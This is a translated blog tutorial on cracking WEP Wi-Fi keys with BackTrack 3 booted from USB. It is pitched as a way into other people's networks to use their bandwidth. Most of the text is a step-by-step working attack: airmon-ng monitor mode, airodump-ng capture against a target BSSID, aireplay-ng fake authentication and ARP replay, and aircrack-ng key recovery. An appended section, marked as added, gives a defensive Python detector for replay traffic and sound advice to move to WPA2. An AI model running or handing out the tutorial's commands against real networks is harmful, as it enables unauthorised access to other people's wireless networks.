BT3 cracking tutorial (USB): cracking a wireless router password

Source: Internet
Author: User

BT3 (BackTrack 3) is a Linux distribution, like redlinux or Red Flag Linux. What sets BT3 apart is that it integrates a large number of hacking tools, especially tools for breaking into wireless networks.
If you want to break a WEP- or WPA-encrypted wireless network and get rid of the Internet bandwidth, you may wish to study this, which is very interesting.
In addition, since bt2, WEP cracking has come down to a few minutes. It works even if only the AP is running and no client is connected to it.

Switch the VM to full-screen mode.
After the system boots successfully, log in with user name root and password toor.
Enter flux to start window mode.

Right-click any desktop location, select xterm from the context menu, and open a console window.
Enter the command ifconfig -a and press ENTER.
If a network card device named rausb0 is listed, your device can be used for packet capture and cracking.
Try it.

 

1. Prepare the bootable USB flash drive: download the BackTrack 3 (bt3) USB version. Put the boot and bt3 folders in the root directory of the USB flash drive, open the boot folder and double-click the "bootinst.bat" batch file to run it. Four more files will then appear on the USB flash drive: "isolinux.boot", "isolinux.cfg", "isolinux.bin" and "syslinux.cfg".

2. Restart Windows and enter the BIOS settings, set the first boot device in the BIOS to USB-HDD (or USB-ZIP), and then restart so the machine boots from USB. The system boots into BackTrack 3.

3. Start cracking now

1. Enter the iwconfig command in the shell window and the following information is displayed:

    lo        no wireless extensions.
    eth0      no wireless extensions.

    eth1      IEEE 802.11g  ESSID:""  Nickname:""
              Mode:(......)  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82
              Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/
              Retry:off   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

2. Find out the name of your wireless network card. Here mine is eth1. Then put the network card into monitor mode (enter airmon-ng start eth1 11). Enter the iwconfig command again and it returns the following information:

    lo        no wireless extensions.
    eth0      no wireless extensions.

    eth1      IEEE 802.11g  ESSID:""  Nickname:""
              Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82
              Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3
              Retry:off   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

 

3. Enter the command airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1
In the command, "11" is the channel number of the target, "bssid" is the MAC (physical) address of the target, and "outputs" is the name of the capture file to be generated. Press ENTER to run it.
4. Open another shell and enter aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
"targetnet" is the name of the target network, 00:1A:01:8D:C3:B2 is the MAC (physical) address of the target, and 00:A1:C1:D8:A5:B6 is the MAC address of the local NIC.
5. Open another shell and enter aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
This obtains more data packets.
6. When the returned data volume reaches 10 thousand, the key can be cracked. Open another shell and enter aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap to run the cracking program. If cracking fails, keep capturing packets until it succeeds.
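
Seen from the defender's side, the replay in step 5 is easy to spot on a wireless sensor: one station resends the same protected broadcast frame, with the same WEP IV and the same length, hundreds of times per second. The following detector is an added example, not part of the original tutorial; the frame-record layout, the threshold, the 68-byte length and the sample traffic are constructed assumptions.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"

def find_replay_sources(frames, window_s=1.0, threshold=50):
    """Return {source_mac: peak_count} for stations that resend one protected
    broadcast frame (same IV, same length) at least `threshold` times within
    `window_s` seconds. Each frame is (ts, src, dst, length, iv); iv is the
    cleartext WEP IV as hex, or None for unprotected frames (assumed layout)."""
    recent = defaultdict(deque)   # (src, iv, length) -> timestamps inside window
    flagged = {}
    for ts, src, dst, length, iv in sorted(frames, key=lambda f: f[0]):
        if dst != BROADCAST or iv is None:
            continue              # only protected broadcast frames are of interest
        q = recent[(src, iv, length)]
        q.append(ts)
        while ts - q[0] > window_s:
            q.popleft()           # drop sightings that fell out of the window
        if len(q) >= threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged

def constructed_sample():
    """Constructed records, not captured traffic."""
    ap, client, replayer = ("00:1A:01:8D:C3:B2", "00:11:22:33:44:55",
                            "00:A1:C1:D8:A5:B6")
    frames = []
    # Ordinary client: about 20 frames/s, fresh IV per frame, mixed sizes,
    # an occasional broadcast.
    for i in range(100):
        dst = BROADCAST if i % 10 == 0 else ap
        frames.append((i * 0.05, client, dst, 60 + (i % 7) * 40, f"{i:06x}"))
    # Replaying station: one 68-byte broadcast frame, identical IV, 400 frames/s.
    for i in range(600):
        frames.append((2.0 + i * 0.0025, replayer, BROADCAST, 68, "a1b2c3"))
    return frames

if __name__ == "__main__":
    for mac, peak in find_replay_sources(constructed_sample()).items():
        print(f"possible ARP replay from {mac}: {peak} identical frames in 1 s")
```

A station flagged this way on a WEP network is a strong reason to move the network to WPA2 or later, since WEP's key can be recovered once enough such traffic has been collected.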

Source: chinadu's blog
